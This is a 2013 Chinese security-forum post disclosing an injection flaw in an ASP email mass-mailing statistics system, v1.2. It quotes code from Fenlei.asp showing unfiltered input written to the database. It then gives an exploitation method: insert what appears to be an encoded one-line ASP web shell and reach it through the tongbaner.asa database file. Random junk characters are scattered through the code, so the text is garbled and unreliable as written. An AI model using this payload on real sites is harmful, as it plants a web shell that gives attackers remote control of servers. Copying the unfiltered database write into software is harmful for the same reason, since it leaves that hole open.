找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1979|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
'Fenlei.asp
( N6 Y, v* v. _; X6 w9 d. s" Z- ^' j( Q) a) i) D
IF Request.QueryString("Action")="del" Then / X6 C+ Y; c5 }9 s- S! i9 @
ID=Request.QueryString("ID") # l6 ]( F# X8 i8 w9 s5 ?- D) i' v0 J! S
IF Countss ("tui","Fenlei",ID )<>0 then
  m$ W0 c  _6 X. ~'略 ; C$ h) {3 P1 K! y( v* H
IF Request.QueryString("Action")="Add" Then + @0 \% v& o6 R7 t9 x+ H
Tname=Request.Form("Typename")
5 r* K. |4 }9 s* w* i0 RSet Rs=Server.CreateObject("adodb.Recordset") * x) p& F" ^: E! s4 _5 ^( `' k# q
Sql="Select * From Fenlei Order by id Desc " / T( _# D9 [* b
Rs.Open Sql,Conn,1,3
" T" ?2 O& T! m6 xRs.Addnew ; }, ~2 f* X3 o7 _  K- B2 W  L
Rs("Typename")=Tname
  m2 q- n* y5 d" f2 H1 Q'略
3 `- E, K& ^8 wSet Rs=Server.CreateObject("adodb.Recordset") 4 T" a+ G6 A5 `9 r
Sql="Select * From Fenlei Order by id Desc "
* c$ Q( ~0 n, F& @% M! u9 G: hRs.Open Sql,Conn,1,1 & p2 P, e( I# A) k2 b) u, r
'略 ( {: i/ t% M  |8 ?+ w
%>, w$ V9 M9 W, s

% I  ?; ?5 K; Z
" ^: W- @% t# T+ s7 k% m; s
0 V% z0 |/ m( r$ x2 B- {9 X没有过滤,直接写入数据库。/ f4 k9 z1 }0 G$ b
) ?. A" X5 O5 }9 C' v+ _  P
利用方法:
$ j* ]& [5 r% p8 r0 k8 y 5 N  a: u# N5 s" H
插入:┼攠數畣整爠煥敵瑳∨≡┩>0 @. Z) o# W: q/ i9 [- y5 R
6 F0 [) F8 H' B& y
  e- Z. t* l( s3 I. d/ C0 i$ d: g
连接: http://www.xxx.com/###tongbaner.asa   G. j% [  v+ }1 n0 z
'默认安装文件:
9 e* s$ T( a' E. }3 x'install.asp) s* d% {" H8 G$ R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表